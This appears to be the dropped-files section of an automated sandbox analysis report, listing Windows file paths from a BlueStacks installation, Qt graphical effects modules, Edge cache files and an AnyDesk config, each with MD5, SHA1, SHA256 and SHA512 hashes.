SHA512 120a9cba788491faa35a5db442e2df8ecc525ab681ec8ae5979d290f7500b1f35ba07fae0470823b873f99bdbdcea4a7b63cf2e20d332c5f7d16c93a59296bff

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\RadialBlur.qml

MD5 b78cf00f13209d60c15dad8ad9fcad7b
SHA1 32d066e508b44c0011b858467e954c646c7ac123
SHA256 bca0b0014593e8ba8201b4dcdec26bd540ba53fab0636e6b808eafce7a41a0f8
SHA512 d52834545d02114eb113bd1c02926fb653cc966b5141f019ec141c749d35184ab2b968273f64e434867887f8ff2a9b5d297189d7e483f19829fa42bcc9d6efb4

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\qtgraphicaleffectsplugin.dll

MD5 41907ae0655574be77fbcc39abed9cb5
SHA1 4550f85f9645dd68283ae4feacaa41ba02191b1d
SHA256 60ebd344f40cab6c49dd92923c3af5d51fce784561e3d1308a3f9617bc6940ff
SHA512 1df2e6b5ef363df2c7c6cd9c2c5de950954645bfb42fb976bd62723ac3cd9eb54cb4b5061190abd40d46adb2621422e5ed7279a5c55de2a7de3227e0628f246d

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\qmldir

MD5 b30fdda9d8391bc35ebfddb4ad45952f
SHA1 e614abd59dcafd491e456cb48695a4c932d05b0c
SHA256 a33ac64a4da419166ea7b498f5b5573b8b0f3d9068c7506c6911f17faeb947f0
SHA512 6265e82481cf9627c3fc75458389f61cae3a5fc719662ad673b6c7f4cd52ac3ccc0ac940edba3e8537fa511fc15b69002d17216f351f99bec335c24014396901

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll

MD5 7616224ea139a2685cf099435b753989
SHA1 4f37adb583341806e0c0568cd88ea62e9bbd5b0c
SHA256 a5ad526e6c577a53abc9a10aa1eaa6c1496fd7d253b55c9366813ea2d7727dee
SHA512 09419655da5764beab04ddeeaaf608d21f0f790a023c5ec92da6307d3a0938f7caf09307696ee2a0cfcc894b2871e0c92564e3857e830049106b24c81fb89cc4

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\qmldir

MD5 82be01f1ad655ae2e5068903171bca0a
SHA1 810adfb9c00a5fa65ac7ff30b0a2ca05f873e058
SHA256 d7681c4c0c927f07eef863a156e254bde0bfeb48a0eea88f135b80325aa77fdf
SHA512 97e777fc63a9d851b52a4b9fc2ec1696a3f0beb72dbd91fbbb8ea7f16cbee421d4707dcc11672f6f8aead8098fa3df3b6044607aacd3f573d5a0b22f4cfb611d

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianMaskedBlur.qmlc

MD5 4023291ab80cb36ac61cc849e13cf8bd
SHA1 1e50150d580fe343ccbd1f305b0f3f15a57be8fc
SHA256 a04d23a705cebc123c5c6c0137fdd1ade6f90b7bec29e3f689bae53444c4778e
SHA512 c35d8d67fa4e2cdf12d8e1907e73a94581a7b51dfae0562366022fc2ef6f0e51a9f00b26198c0d7bcea955c39d23f17b2c9fc3e17d79f9c9ca6e05ff906d38c8

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianMaskedBlur.qml

MD5 491679ad9d744a35843ad99fa7273435
SHA1 a33fa076be8bfae915ee8249ca3c78fd314e9549
SHA256 5c69b8fe2bc4d17eb8f85d2a348c10944668e1021efa1865a9e2548f4fe5836b
SHA512 55f8eb312bae88e15c5ded044c377275ad68d0c10f82b9119e0d960a3a7f1c58c4bc83e248f54bfce189017ad8535010b00415cd992ae1c60aeb1613e73b8546

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianInnerShadow.qmlc

MD5 82e1216d2e0cee543abcfe176d14d822
SHA1 3afd46a6710125c0667c14c82f99ba3a660a6248
SHA256 0e520e5730f36c68f0b7a0b39bbef6a5dcfba381f4599475f66add52e02566bb
SHA512 e38065ff49350a4fa6873d1a164702f234132477c6188dad0b60093a7f73d759cefc5b6f8f17ac17b1876154610332e88aee35f94eebe4a074ae417a7146ea70

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianInnerShadow.qml

MD5 804f3062885449c034cab92fe582d8f7
SHA1 b2f77fdc6b1acd52a7c9d63dbea81919b376862d
SHA256 21af6e8f474fb487cc40d62b6d5c659a746e924e842f420245775cb972bc3739
SHA512 bad9dd6923aee85f2f510138f077b892018d353a69676dd05f5880562913c18f70cf93eb3366e98faa044d1bdc92120e774c66b49c103ff1a38aa89a95b1db0f

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianGlow.qmlc

MD5 5ce050469d37f32e642afd3d412edfcf
SHA1 8e5c339113492efe6a71fb41a66c1fda4993f6fd
SHA256 8d2b273b7b8eb109cc81ac3ec0631ec5b40fbfd0219a5beb539e5c29dd583ae8
SHA512 cab22042e729260b10d6c19e06d528ee7cfcb77912942421e075e973c135824689adfffc4776211845366ffe2ed88c056c18796edd7c06e57fb7f63eed5608b3

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianGlow.qml

MD5 b54698828093981a262f344e8bf00720
SHA1 284f93b68b4d2f781000fc23a224545a10baf882
SHA256 0976ef8bc0cd7c9e9ef43ac6e376665ef3fe8975ff27406f534a5238836a6ddc
SHA512 47a85de1b2038305df633b6dbf0791c6344c74254ef8dfc4c1ecb725d8ffe47954c168c2786255e53292d00bc8bae049a6da010670824688b82c47cb8e32dbc3

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianDirectionalBlur.qmlc

MD5 3e8c250531599b9a3dbbd9b7db88b90c
SHA1 bd5cf89cca097ff9833c4f5bd5c79154955d9c87
SHA256 cfab0ed624ad19b5d554093210cf3c74242c6a09d1e3ed7ab76ea1fe0235383a
SHA512 0f43e3f0cf83d75a37eff4d7a7542bc27d80de3d6cc00bbd0612544b54bb0c802323f2e479cc1ed86a372c0cbef378a0075b8ff1f1547dd801343f358ecb6529

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastMaskedBlur.qmlc

MD5 5765510cacc79d0a6946cf390078b08c
SHA1 1e24095d8031b0b5a1ad3018eda077e4024b086f
SHA256 c6fa5927784c674b4d56abc4cbd3c34d3f9e51168c0c3f0e27f71226d4379a86
SHA512 62825719992ad06d097376d32cea8ff2c357d01bd60ef4a109e0e03b3231b75e5c0f9cb5b53d7402f4ef936dd957c2017491b6ab0e5fedec3761d5c33eb48c89

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastMaskedBlur.qml

MD5 b7738f9522c79bcf2c02c6e786e110a6
SHA1 e2e48ba76267475db3fb0bd0c2099301693dbc94
SHA256 6bafd1fbe707892d9a02cad301d2de8b149a6695cabdf994b3b102358aab5f0e
SHA512 865d60364e39c5511bef74135275aa55127e71d24fb4af5bcf558bff538b9527d54728e34c7ca20f0c7fd826b5b6508ff0111181894cb108ad427f7ce0267bb8

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastInnerShadow.qmlc

MD5 84011dba0ded0a1506e9ce5bf7e7132a
SHA1 6e3c13a05874a0b928e1ea73352ae92a0c415592
SHA256 91034aa0fd7b84a00944085795129d845ec26b7125ac26fff026c186b0d1fb5f
SHA512 3d13109a7d1d17f6e4fc960025863154e158f293febb5194205c183777e0574d50cf74da2d0b7960a3114c4ebf5d2d080dff014c9de89079c436bbd90ec5cc60

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastInnerShadow.qml

MD5 9fcc8b2b293f8a45ffa13cdec6b873b6
SHA1 6f23fa0cce4ef0ccd3f5561dbb77fcd15e0b46d1
SHA256 676361ae072fa9dfef37dc9c0d5ec5d5d5c7a55a6b89cc089441bb8d3ebe725a
SHA512 21767f520f092ecc8c9dc2cc6ede6e703e433a760d65a7b8bc3f8032577731ebaef7a00bbd59d113cb4a0009eb0442df3684e60ba7966aef30963b56414b7d4e

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastGlow.qmlc

MD5 d4917acac1191da099c96cc9a5dc83a6
SHA1 473a7a03d733529ac77a5ab85743ce7403da381f
SHA256 998c912fbd9f2d518f117b2831360f22b15e2a658adc0301dc4f07f4d75cff40
SHA512 4687ac341142edf7bf6afeaec65e58815e9e292833b13247ca9863699daff28870221e9928e0c1902422eb3158fccff58ea9277f765a26d1120c50003fe006e7

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastGlow.qml

MD5 ad9b239016c87b2e821863ecb7381d67
SHA1 5712040672d6ac820c862903c611b6034190a914
SHA256 82d6866cd116d6a13bd447f74b8b1b69203ac20e0f6f82c414b95c2319dbc0bd
SHA512 4d21eaf9c2dffbbcdc29eb49b84bb80045350ea67c394edf5a122bc32d28a60b6da437369fa8a98d3da226c575650a379100c296f8c92a2b6d2a90234210e0a0

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\DropShadowBase.qmlc

MD5 44cb1c96bd308f14c6e6e3293f97fc05
SHA1 891ab31bde6bb5867f1539810c38358e029c98e0
SHA256 d391b8db0b97b4b3aa8e0122526f51f24c84fe942a51822149c6886ecf482f09
SHA512 cc4838b433310a7c4be290a03beef910c190de63a970b5afa6ece5139ebc97745b30857a09f16bba1b29765077a9db263cac94ba6878001903bcd6fa0af8ff09

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\DropShadowBase.qml

MD5 66f77dae9f921f1e2c1878aee58355ae
SHA1 33c8c14579cca33a3b53447251e4303d87b2b667
SHA256 789f40939fc44ae0fa006d4b47b85630482f501a58ea798538edc56a62d62103
SHA512 e35e27e77c7e75310d3b43d7c0e920d83686bb4cb4b654c8c790dbe92e61c6d27a38bfc88e1710ced31dd386f6b0ca4f2452be9f87b308521382e5abac9b98ea

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\plugins.qmltypes

MD5 c76bd51b4ec5299e2cc9ebdb505ab848
SHA1 430083140e4aab9adbf39ad81e2fc820274a82a2
SHA256 6350c17d1667563eb1dfba75fe5c4387ccc3f18f8ea1e266648f5df463c1ccf1
SHA512 88068751e49c91d6309098bcaa76a6437abf36ea1c14174e250ecf5b0f4a55a85bf42607d7b4cf61393d8b7dad41c2dbad3a4d15d3726667fd572e06f9b5b40f

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\OpacityMask.qml

MD5 b374702fc8b9611f4073c1413fb23dbd
SHA1 51fad11565692b9ad0e1d2b05b5594995aaaf946
SHA256 efb3d68fb238a76dc3178cf120f29eed78ef5a750a188a7818083ecdc4093a2d
SHA512 57932c192baff0113dc8883ec73b3cd27fa3851d2731c4740b5f97cce693b7df30180d986cbbd0dce67de873cd066f23049274139e037a4527f9a7bda99d5418

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\MaskedBlur.qml

MD5 f2989fa1a4647999fd6b42e7066bcb16
SHA1 9533409c713da48c31a7849e4bd7776ed134e9a4
SHA256 5768ca07b9c710b53483c56a613dfb175edd3c1b574a69705103667ae0130349
SHA512 2ed1072107d65babe6aee082ad8d7d104d9265be750d7e79abf2a574f92772e7b6a2e607f434946c70d121327971a306968f60d0e6cdfa2ca9f97b36cd2bb7f3

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\LinearGradient.qml

MD5 1ea2150858345eee0bd6d2f07a2a2d4c
SHA1 4d0576aafe4e85c46840fb1f9a4b98f28fd6938e
SHA256 b91050e8bd57c743aa018925eb7c47844eef6219da88835474cfd505d633630e
SHA512 de6a2f492c6920de38ffa3a4812344415d7f1206aa2cb7fe666cab68c039ef3e25457cd58f306c047116d835eb485553ab8bf4e0b5e000894509b3ba9dc77c15

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\LevelAdjust.qml

MD5 c06a6e4b80a67628614ada928fbdb565
SHA1 f27763a6273075adbcae86606d557b19905264fb
SHA256 3d79efeb518148e6de6b5e61d46e0303ca9a38f2684b9bbf45dc7751d281d6e5
SHA512 c35c194a5e543d3249d4a907233ea5e7520573e67da500dea7f90e15194f692d649121b5b01d4db70837dbde02fc29ad1144988b7b6a727d83366c145bf56898

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\InnerShadow.qml

MD5 a509a66bf6ff6c0b42bab956512ecb5e
SHA1 a276cc164b2df23c29b54e336652e4b022f421bc
SHA256 b32f6e360a5740475d95969cd4e1fa8350e78f707ac3ba24b2a555074fbcf4e5
SHA512 53e9f91e328371df9f5ea51c8b3f4dd2014ebbf26d1cfa0167bd50d60449b1107a37b29432fe98e2f027ca8c717f3aaf156244bf3e650ccf18826316b425f1d2

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\HueSaturation.qml

MD5 86f08a39bd6d8ddb8debc4ac928d3747
SHA1 d76d483a0cecd47cb235c27b0345e31ad63d405a
SHA256 8a8f90876f612e2aefe1594a15ec2b7e8fac3a66af36ab9bf328efe0f232f5d6
SHA512 8fa09fcf8303031271ea940f7a5fb4829918612040f53e3eb6cb1b9aaf96d0f1f47adbe56c3f65e47108ba5df1f005cacde527206a468f49b6dc03981bf65281

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\Glow.qml

MD5 f39b620c9a1d84327c7dcf32839d3503
SHA1 d03b917ed069848860136c5dfb57bf6e38e70485
SHA256 9e8c1f27320a3006c315c23ed4546aa4ae3ef63339248f22afe91a627eee6cbb
SHA512 fe7f2f3ae970bd55a51e90c4dd1eddc42812194a2ef98aef48a74b01b10a6ef9901107bc5cbb6f40d9872e141632150b4266e328282b7c03e2de7dcf9a375617

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\GaussianBlur.qml

MD5 16df85757d5147e7af13a943346b1a3e
SHA1 ca067a653d9a817599c29f82bef4f640b2bc87c7
SHA256 6df15f72f44b0108a904113cafdda279c25cca6ed29323600ca3e46a573fc89e
SHA512 de7127c4d5e6600144fc9bac79e3cdb86e7bc2e7b0a701ea01012dc363c5d187de6654cf7ed48162af151d9e997aaf27f9a5b1d26a66df2ee92c1a04e69b3a7b

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\FastBlur.qml

MD5 6604726b8e542e4801894cf7eba8d1d0
SHA1 7614a3bbf75f1f5aef13df19464a2415fa503880
SHA256 ff5c14f3c1bdcf2942decb767a6e2a246c3781448503214053a2f16cbde18553
SHA512 18e8c1884e8b2660149b698e44bcbd0cd63601bffe6ede3bbc0ea37502cf3948a1562fe28024257c0555385bca9201e039f9ee2330353c72aae81d671df67e28

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\DropShadow.qml

MD5 f80ff7be82b6042179b8d3baf6c44e52
SHA1 af2436799da9913ee1d65dc1ec85eb64e5443123
SHA256 ab0ad4d055b15ae2c8cfddd17c0067bd44964c8e35d848cf2e484a7ef9d7efdc
SHA512 f03a000e0825ece799c58fe30556abd0cc7ca1a64606e5868010728eaba72f981284e22152dad5dd80b99d3e83548d38b4ef4c77ec23f41fa69776dddf50b6ec

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\DirectionalBlur.qml

MD5 057a23d74c1a2d09f0dbcf026b181831
SHA1 faa64b8c9355ac266192911aa549905cc245697c
SHA256 7bf44aeb3654480e2d1c23ca76e53ff5958574766dd95d3cd1f3a1e84510146c
SHA512 89df4ea201e6b54e80c63072c9e30f4023065f57a451da602978f1cf72740e721edb030bb0790cafe67fb8d958b1ab6c0c1d93a37db3138a1aba9a690540ee7f

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\Desaturate.qml

MD5 58fe5795a1786e903b35d6c31220d8e7
SHA1 3d4391ac01510c4e0b3eebba1f2cdae841dfa14d
SHA256 0f08b5d757f3a1d7db0e7502cccf2cd4975ce8924c091ce8b23e6889ade100e5
SHA512 887b9e539f8a397f78b38b4d44ed3ce14a044c23f1943a565d0687bdbdaf57f2d1387fa863a61144807ec7122d9747069bee64f6c626692acf4513e0f31dc5a5

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\ConicalGradient.qml

MD5 54030f53938f983bdfe7a8143f45d059
SHA1 74421632f3c1c1d9a3f91664d87da2875a14ca85
SHA256 0864cb8e38b25d27966332fa41982ca2e39749b24fe3c173e79877c93fe405c9
SHA512 3e698998e4c04956aedb2e337c2b5b3e848b8b344eb8bdde28beb60970b01c1a6136d86aa2c704ade53fd6c38f8a733ba54e7bc91ec13f43d2c2d056ac655610

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\BrightnessContrast.qml

MD5 6fdc937726d698a82297d6ff6f00c39a
SHA1 bbc4462478f739676579d25a79a1415a42bb88fb
SHA256 64fba62556110159e3bcb22f2f7106cb38c12b2479fd289c3c51257b8be03824
SHA512 76b4248641cd46a053d12082399b1f6e26922b7f3054920bb27c7b6f4bf0906f4178f568a78a8e1ee2f2e5c779edf789ccbcbc2fca44d5506520c5d5927e37da

C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\Blend.qml

MD5 beaec37788f543b4ab3c5c4634c220cc
SHA1 7b75604471d2d4535bb72401adfd1bd6fa82a317
SHA256 cc6ef573aee3df53dfcc60df2d438c345da6028f137ab0747c941c13c54cb6c0
SHA512 327d9846e1e850d94401d423f9885b1d413651bddb3f6a31891c75a25b34aeb0c40694cd619271f970a0248e7ccbc1d3a47c52f0ac599ccab875af45dbb069b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 bee51384e384b158140aa62bc730bcec
SHA1 1492578276c1af266d55f5b9415c6f88456b0b48
SHA256 432b96f984f6a1aaacbcd078a47969161ba4b12fceced2643ee33589250cbd2e
SHA512 1d396bf060967d1413e9af292454cf43eca181ad71dee0e6cf53e2cf1b2468d27765f343c9b89a9141d8ff882097419670c3fdf4fce48a78068bde60e660daf8

C:\Program Files\BlueStacks_nxt\Assets\installer_bg.png

MD5 08d091faf58df0ea8218d7e08140bbeb
SHA1 38ebf2763bd2082635a5971c4302021ecaddc0d1
SHA256 7e5f6998d34d56aeca87f676c12a42c6c4362ae16a753dc567aae00e253b0817
SHA512 5cfede2ea2ade7bbc4b63475af5eb52f78af567fa7096a2ead396056271b8745df4dc6e11e4328151ce59ab74c6c48fd49cd13e30f7f4b86c566757e310fd5e8

C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe.config

MD5 1b456d88546e29f4f007cd0bf1025703
SHA1 e5c444fcfe5baf2ef71c1813afc3f2c1100cab86
SHA256 d6d316584b63bb0d670a42f88b8f84e0de0db4275f1a342084dc383ebeb278eb
SHA512 c545e416c841b8786e4589fc9ca2b732b16cdd759813ec03f558332f2436f165ec1ad2fbc65012b5709fa19ff1e8396639c17bfad150cabeb51328a39ea556e6

C:\ProgramData\BlueStacks_nxt\Client\Assets\menu_help.png

MD5 2e82bd45c7a8b2e216c27a24d42f12a8
SHA1 8ff552358b2d77090a54dad0c12c2757af2ec433
SHA256 e55ef002466578307998045edd5e10577161efd1cf8f1a71768a8046f4c2ee0d
SHA512 d8f44a110bc31d5834b337553baa599c9a127d7335aeddd7e139ba5c7851db006d36ef74d841f10f7fe69e25edffd89a6faea9d3c72eba27bbbade843af440f7

C:\ProgramData\BlueStacks_nxt\Client\Assets\minimize_progress.png

MD5 90d5c0e2977d65b21b430f486114521e
SHA1 cfb48cef2634d4be33210ba54e5b7c5c197530e4
SHA256 aa538477ded33f33e33cb9a21241dacaceaa0c3e5ad8eb1b6830a448262bc998
SHA512 9a3f6690a638a69232335b746a4512ed1c623baa984d87cf4127663c4f85e818a4220564c63b764570e2ade8302989482580af7d9032052335d44b9c98d2d37b

C:\ProgramData\BlueStacks_nxt\Engine\Manager\BstkGlobal.xml.in

MD5 8c11ed64e4cb4e992c891a1685f5e0bd
SHA1 1b125f8aa3f77ab5e23bcf18ff7fd9efa5232bc5
SHA256 4c64d4ad8897d3198cc69c27e54c9ad24aafd70ee2818a4eb3a970f24b7cd535
SHA512 c2eee227704f0940bd46db419e42f15ce0dff3b006753c94005ac4c063fe2a2f0f24833a6674e9bbe570adcb425277a78bbbf398d600017e05357f33661d7c7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 3a9f7f77a8f56730a70e92214d82fc6d
SHA1 c6d276c680c9ad8734510d17988369dc43c7ea6d
SHA256 7e166bf371957c1821c80f4d573adf538c982055dbb5659b7a9c6ba29c055d10
SHA512 6fa4c78a0a4b7a8c0f390cbcdbdc40429d20d4a91e2230c19ba58389dc76ddb01a0e12b9b6e58750458214985d98fcd2010751cca83a826fb0f8b0b31ffe8f06

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 83daeb8cc1f5ffb0c095e76e052087cf
SHA1 ede12cc6431add99c31d9293561bc387db0fc810
SHA256 61f5a0431bb75dd796ba9050a53096b99e1c01ace45ac1a12b866bad6d1eaab2
SHA512 99571f26aea5e63bded1254c6cdf33df3212686d2ad61b878371a9af9d2e38d2cae4a391d4966e8849239049a413477c014477770da2fa1be5e39e95c9c98df9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c31bd715304a9dcd07bd6429422f2c11
SHA1 da1c0e3e7c712cba9f6483a036a333a9cdae6823
SHA256 85d4ddf29c7f4aa36ff9e19a9ea0ce36f55b13fc249c1b894f8c1b3b37991928
SHA512 b68906f8c4f2df9f08e36655427fc4a7f914056a3c8af5fec056452fc3a34e3feb9b316eafaba6229afcaddf583dec92f9c3b0bd1841057483e9d7906f160e87

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8f32dce2029cd6c0873321305267a505
SHA1 e21c4cc50562961b1e76a31a74287cb5f56df665
SHA256 6d6e7d45df690747e692be6812663e0a45d8e3420bbee5515af74198e9bf2967
SHA512 58c84810932349c1194157302cb6e7e7b7811609139b17ca2d75c2fb2c6b68717622db554235f874d7cd2b6ebc604a0baa0ef381d67bad8c7a27f4db65223746

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a34e3855f28ca1bf1c2fb1278952df21
SHA1 4382cfcd321ecc2e2de42356a03d2f6a5089b8ee
SHA256 90c69248c0fb84ce54b36240e50ae8a50943896eb59fa8d5a5a76b3e39ef5c35
SHA512 68295df868eb8ad8bc8347656143e601de73c7ece0789275dc9b3c6e5f7886072e8b544b773310eae3b761fbcd56d70dbb44d620ed12cf533351de8db14ab34c